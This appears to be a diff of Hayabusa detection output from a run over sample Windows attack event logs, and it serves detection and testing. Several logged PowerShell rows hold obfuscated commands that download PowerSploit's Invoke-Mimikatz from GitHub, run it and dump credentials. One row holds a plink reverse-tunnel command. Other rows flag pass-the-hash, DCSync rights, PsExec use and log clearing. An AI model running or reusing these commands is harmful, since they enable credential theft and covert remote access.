+2017-08-31 04:16:21.338 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"' '| FOrEAcH-ObJect { $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:25.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:25.963 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ $_.lENGTh- 1 },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:16:26.128 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Char][iNT]$_)},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:25:04.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('IEX ('+'New'+'-Object'+' Net.Web'+'Client'+')'+'.DownloadString(oH'+'4http'+'s:'+'//raw'+'.g'+'it'+'hubuse'+'rcontent.c'+'om/m'+'at'+'tifes'+'t'+'a'+'tion/'+'Po'+'we'+'rSploit/ma'+'s'+'ter/Exfiltra'+'tion'+'/I'+'nvoke-Mimikat'+'z.ps1oH4'+'); Invoke-Mimi'+'katz -Du'+'mpCred'+'s') -REpLacE ([cHaR]111+[cHaR]72+[cHaR]52),[cHaR]39)| IEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2017-08-31 04:25:20.783 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(((""{41}{32}{44}{45}{20}{36}{35}{21}{10}{40}{29}{42}{26}{28}{1}{19}{15}{11}{48}{49}{39}{30}{4}{18}{47}{31}{24}{23}{33}{43}{12}{13}{7}{8}{22}{46}{14}{27}{25}{5}{0}{34}{6}{16}{17}{38}{3}{9}{2}{37}"" -f'1','ubuserco','Dump','tz ','festati','atz.ps','); In','s','t','-','p','m/','/','ma','ion/I','co','vok','e-M','on','ntent.','load','t','er','l','p','e-Mimik','.','nvok','gith',':','ti','rS',' (New-','o','{0}','t','String({0}h','Creds','imika','t','s','IEX','//raw','it','Object Net.WebCli','ent).Down','/Exfiltrat','/Powe','m','a')) -F [ChaR]39) | . ( $ShelliD[1]+$sHELliD[13]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2017-08-31 04:25:48.631 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$l7i= "" ))93]RaHc[ f- )'sderCpmuD-'+' ztak'+'imi'+'M'+'-e'+'kovnI'+' '+';)}0{'+'1sp.'+'ztaki'+'mi'+'M-ekovnI/no'+'i'+'ta'+'rtl'+'ifx'+'E/'+'retsa'+'m/'+'tiolpSrewoP'+'/no'+'itats'+'e'+'fitt'+'am'+'/moc'+'.tne'+'tn'+'o'+'cresu'+'buhtig'+'.war//:sptth}0{(gn'+'ir'+'tSdaol'+'n'+'woD.)'+'tne'+'ilCb'+'eW.t'+'eN t'+'c'+'ejbO-w'+'eN('+' X'+'EI'(( ( )'x'+]03[emoHSP$+]12[EmOHsp$ ( & ""; ( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE[-1 ..-(( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE.lengTh)]-JOIN''|& ( ([StRiNg]$VERbOsePREferENCe)[1,3]+'X'-join'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2017-08-31 04:25:48.647 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,& ( $psHOmE[21]+$PSHome[30]+'x') ( (('IE'+'X '+'(Ne'+'w-Obje'+'c'+'t Ne'+'t.We'+'bCli'+'ent'+').Dow'+'n'+'loadSt'+'ri'+'ng({0}https://raw.'+'github'+'userc'+'o'+'nt'+'ent.'+'com/'+'ma'+'ttif'+'e'+'stati'+'on/'+'PowerSploit'+'/m'+'aster'+'/E'+'xfi'+'ltr'+'at'+'i'+'on/Invoke-M'+'im'+'ikatz'+'.ps1'+'{0});'+' '+'Invok'+'e-'+'M'+'imi'+'katz '+'-DumpCreds') -f [cHaR]39)),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
+2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
+2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,../hayabusa-rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:22.965 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
